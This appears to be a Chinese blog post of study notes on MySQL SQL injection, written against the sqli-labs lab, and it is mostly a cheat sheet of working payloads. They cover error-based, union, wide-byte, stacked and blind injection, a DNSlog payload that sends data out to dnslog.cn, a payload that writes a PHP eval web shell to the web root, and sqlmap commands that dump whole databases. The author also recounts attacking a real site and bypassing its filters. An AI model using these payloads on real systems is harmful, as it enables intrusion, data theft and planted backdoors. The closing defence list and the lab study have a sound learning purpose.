前言

---

实习电话面的时候，问到了sql注入的利用，我扒拉扒拉一大堆，结果脑子一抽，说Mysql注入不支持堆叠注入

我学安全目前最后悔的事情就是，最开始入门的时候，连数据库这门课都没开始学，当时连最基本的sql查询都搞不懂，一上来就去做sqli-labs靶场，对着教程复现，蹭蹭蹭做完一百多关，啥印象都没有，记录的笔记七零八落，连做的笔记都看不懂，现在打算重新出发，巩固所学内容。

漏洞环境：

---

环境：win7 + phpstudy + sqli-labs
部分数据库数据：

基础学习：

---

当mysql版本大于5.0时，存在默认系统数据库 information_schema ，该数据库保存了MySQL服务器所有数据库的信息。如数据库名，数据库的表，数据表的列 表栏的数据类型与访问权限等

常见表名及相应的字段：

information_schema.schemata       #Mysql里的所有数据库库名
information_schema.tables         #Mysql某数据库下面的所有表名
information_schema.columns       #Mysql某数据库某数据表下面的列名
schema_name                     #Mysql查询数据库information_schema.schemata库名时候的列名
table_name                     #Mysql查询数据库information_schema.tables表名时候的列名
column_name                #Mysql查询数据库information_columns.column表名时候的列名

该数据库拥有⼀个名为 tables 的数据表，该表包含两个字段 table_name 和 table_schema，分别记录 DBMS 中的存储的表名和表名所在的数据库

常见全局变量：

user()    #获取当前数据库用户名
@@version    #获取当前数据库版本
@@HOSTNAME  #获取计算机名称
@@BASEDIR  #获取mysql安装路径
@@version_compile_os  #获取目标操作系统类型

报错注入：

---

报错注入原理：

当在⼀个聚合函数，比如count函数后面如果使用分组语句就会把查询的⼀部分以错误的形式显示

利用函数：

Rand() //随机函数 
Floor() //取整函数 
Count() //聚合函数 
Group by key //分组语句

floor()语句报错原理：
利⽤floor(),count(),group() by冲突报错，当这三个函数在特定情况⼀起使⽤产⽣的 错误

extractvalue注⼊的原理：
依旧如同updatexml⼀样，extract的第⼆个参数要求是xpath格式字符串，⽽我们输⼊的并不是。所以报错

报错注入常用函数：

1.floor() 
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.extractvalue() 
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon() 
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon() 
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring() 
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring() 
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp() 
select * from test where id=1 and exp(~(select * from(select user())a));

# 获取当前数据库版本
id=1' and extractvalue(1,concat(0x7e,(select @@version),0x7e))#
# 获取登录数据库用户名
id=1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#

获取当前数据库名：

id=1' or updatexml(1,concat(0x7e,database(),0x7e),1)-- -

获取当前数据库表名：

id=1' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)#

获取当前数据库所有表名：

id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))#

获得user表所有列名：

id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),0x7e))#

获取相应数据：

id=1' and extractvalue(1,concat(0x7e,(select * from (select username from users limit 0,1) as a),0x7e))#
# 获取下一条数据，以此类推
id=1' and extractvalue(1,concat(0x7e,(select * from (select username from users limit 1,1) as a),0x7e))#

这里有个问题，就是通过xpath报错最多只显示32位字符，而很多时候数据库密码至少都是32位加密的，也就是爆出来的数据不完整，之前发现一处小站点的sql注入就是这种情况：

后台登录界面，风格还有点小可爱：

后端简单的过滤了select、from、where、=等关键字，简单大小写绕过及like绕过即可
目标为阿里云，sqlmap一跑就被封，听说可以用阿里云跑，可惜我用的是华为云，都怪当时阿里云不认可我的学生认证，渣男！

这个时候我们就需要用到 mid 函数来进行字符串截取操作来爆出后面的字符串
使用 mid 函数我们就可以使用这个语句来得到后面的字符串值

mid() 函数语法格式：

mid(str,start,[length])
str:截取的字符串
start:起始位置
length:截取的长度，可以忽略

联合注入：

---

判断字段数：

id=1' order by 3#

确定回显处：

id=0' union select 1,database(),@@version#
id=0' union select 1,updatexml(1,concat(0x7e,(select database())),1),3#

获取当前数据库名及表名：

id=0' union select 1,table_name,table_schema from information_schema.tables where table_schema=database()#

获取当前数据库表名：

id=0' union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1),3#

获取当前数据库所有表名：

id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3#

获取某数据表所有列名：

id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='emails'#

获取数据：

id=0' union select 1,id,email_id from emails#

获取所有数据：

id=0' union select 1,2,group_concat(concat(id,'|',username,'|',password)) from users#
id=0' union select 1,group_concat(username),group_concat(password) from users where '1'='1
id=0' union select 1,group_concat(username,password),3 from users where '1'='1

宽字节注入：

---

防御原理：传入单引号会被转义符（反斜线）转义，导致参数id无法逃逸单引号的包围。

漏洞原理：

mysql 在使用GBK 编码的时候，会认为两个字符为一个汉字（其他编码形式则认为不存在sql漏洞），而在过滤’的时候，往往利用的思路是将‘ 转换为\’。urlencode(\‘) = %5c%27，我们在%5c%27 前面添加%df，形成%df%5c%27。在GBK编码中，%df%5c是繁体字運，这时单引号成功逃逸。

另外，由于单引号被转义，所以用常用的sql语句查数据库表名会出错，此时要用到嵌套查询

编码格式的逃逸，利用不同编码格式占用的字节宽度不同，构造payload使得单引号或其他符号的逃逸，导致语句的闭合，然后就可以构造payload查询数据库的数据

在数据库使用了宽字符集而WEB中没考虑这个问题的情况下，在WEB层，由于0XBF27是两个字符，在PHP中比如addslash和magic_quotes_gpc开启时，由于会对0x27单引号进行转义，因此0xbf27会变成0xbf5c27,而数据进入数据库中时，由于0XBF5C是一个另外的字符，因此\转义符号会被前面的bf带着"吃掉"，单引号由此逃逸出来可以用来闭合语句

获取当前表名：

id=admin%df' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=(select database()) limit 0,1),0x7e),1)#

获取所有表名：

id=0%df' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=(select database())),3#

获取所有列名：

id=0%df' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=(select database()) and table_name=(select table_name from information_schema.tables where table_schema=(select database()) limit 0,1)),3#

而post型的宽字节注入，有个问题要注意：
当我们在输入框输入相关payload时，提交参数之后，浏览器会对%df中的%进行编码为%25，从而使我们的恶意payload失效。
方法一：抓包修改成正确的payload，把%25重新修改为%
方法二：我们可以将UTF-8转换为UTF-16或者UTF-32,例如将'转换为utf-16为： �'。我们可以利用这一点注入

万能密码绕过：

username:�'or 1=1#
password:随意

获取当前所有表名：

username:1%FE' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
password:1%FE' or 1=1#

堆叠注入：

---

原理：

多条SQL语句一起执行
一条SQL语句以;结束，我们可以在结束符后面继续构造下一条SQL语句，这样它们会一起执行

局限性：

1、堆叠注入的局限性在于并不是每一个环境下都可以执行，可能受到 API或者数据库引擎 不支持的限制，此外，在权限不足的情况也不能成功执行
2、虽然堆叠查询可以执行任意的 sql 语句，但是页面一般只能显示前一条语句执行结果，第二条语句我们无法得知它是否执行成功，第二个语句产生错误或者结果只能被忽略

在实战中的利用想法：

找到管理员所在的数据表，添加新的管理员用户和密码

id=1';insert into users(id,username,password) values(666,'book4yi','book4yi')#

可以看到成功插入数据

利用DNS实现SQL注入带外查询:

---

当我们发现一个站点存在一个没有数据回显的注入点进行注入时，只能采取盲注，这种注入效率非常低，而且容易被Ban，这时我们就可以利用DNSlog来快速的获取数据

利用条件：
1、windows系统环境
2、需要当前数据库用户有读权限及secure-file-priv为空
3、DBMS中需要有可用的，能直接或间接引发DNS解析过程的子程序，即使用到UNC

这里我们利用dnslog或者ceyo实现外带盲注回显

id=1' and load_file(concat('\\\\',(select hex(database())),'.xqvzsf.dnslog.cn\\test'))#
id=0' union select 1,2,load_file(concat('\\\\',(select hex(database())),'.xceeup.dnslog.cn\\test'))#

该payload拼接起来后就成了\security.xqvzsf.dnslog.cn\test完全符合UNC的路径标准，解析后在DNSlog平台就能看到数据了

这里需要用到hex函数，因为构造UNC时不能有特殊符号，转化一下更好用
注意：虽然使用hex()可以解决UNC特殊字符的问题，但是UNC的长度也不能超过128

将十六进制值转化为字符串，得到数据库名：

当然，

UNC定义
UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器.。UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用的网络共享文件就是这个方式。UNC路径就是类似\softer这样的形式的网络路径
格式： \servername\sharename ，其中 servername 是服务器名，sharename 是共享资源的名称。
目录或文件的 UNC 名称可以包括共享名称下的目录路径，格式为：\servername\sharename\directory\filename

二次注入：

---

原理：

攻击者构造的恶意payload首先会被服务器存储在数据库中，在之后取出数据库在进行SQL语句拼接时产生的SQL注入问题

举个例子：
比如1.php页面的功能是注册用户，2.php是通过参数id读取用户名和用户信息
假设我们注册用户名：test'，那么通过2.php读取用户名时才会发生报错等行为（多了一个单引号引起的语法错误），从而产生二次注入

order by 注入：

sql语句形如：

$sql = "SELECT * FROM users ORDER BY $id";  

通过查询mysql帮助文档，了解如何利用order by 注入点：

这时可以通过升降排序判断是否存在注入：

id=1 desc
id=1 asc

获取用户名：

# 利用报错注入
id=(select count(*) from information_schema.columns group by concat(0x5c,(select user()),0x5c,floor(rand()*2)) limit 0,1) 
id=1 and extractvalue(1,concat(0x7e,user()))#

# 利用基于布尔的盲注：
# 利用原理：id=rand(true)# 与?id=rand(false)# 页面显示不一样
id=rand(ascii(substr((user()),1,1))>64)#

# 利用基于时间的盲注：
id=1 and (if((ascii(substr((select user() limit 0,1),1,1))=115),sleep(5),1))
id=1 and if(ascii(substr(database(),1,1))=118,0,sleep(5))  

插入一句话木马至网站根目录：

id=1 into outfile "D:/phpstudy_pro/WWW/insert.php" lines terminated by 0x3C3F70687020406576616C28245F504F53545B706173735D293B3F3E
id=1 into outfile "d:/1.txt"    #将本要输出的内容导出到1.txt

快速定位重要数据表:

渗透中总是有一些大型的数据库，一个数据库中有几百个表，一个一个看脑壳疼。
sqlmap有一个参数 --search ，可以用来搜索列、表或数据库名称：

--search -D：搜索某个数据库
--search -T：搜索某个表名
--search -C：搜索某个字段名

大数据表脱裤：

直接使用sqlmap：

python sqlmap.py -u "http://127.0.0.1/index.php?id=1" --dump -D sqlinject -T admin -C "id,username,password"

脱整个表：

python sqlmap.py -u "http://127.0.0.1/index.php?id=1" -D users --dump-all

手动脱裤：
使用mysql自带的mysqldump，如果是站库分离可以自己传一个mysqldump上去指定 -h 参数即可。mysqldump是没有依赖的，单exe就能运行，直接拖sql文件比一点一点拖快得多。

mssql的话直接拖mdf，或者osql命令

防御手段：

---

单引号闭合可控变量，并进行相应的转义处理
尽量使用预编译来执行SQL语句
采用白名单机制/完善黑名单
安装WAF防护软件
拒绝不安全的编码转换，尽量统一编码
关闭错误提示

参考如下：

---

MySQL手注之报错注入详解
MySQL⼿注之联合查询注⼊详解
Mysql报错函数小结
SQL注入之利用DNSlog外带盲注回显
Dnslog在SQL注入中的实战
SQL注入之Sqli-labs系列第四十六关(ORDER BY注入）
对MYSQL注入相关内容及部分Trick的归类小结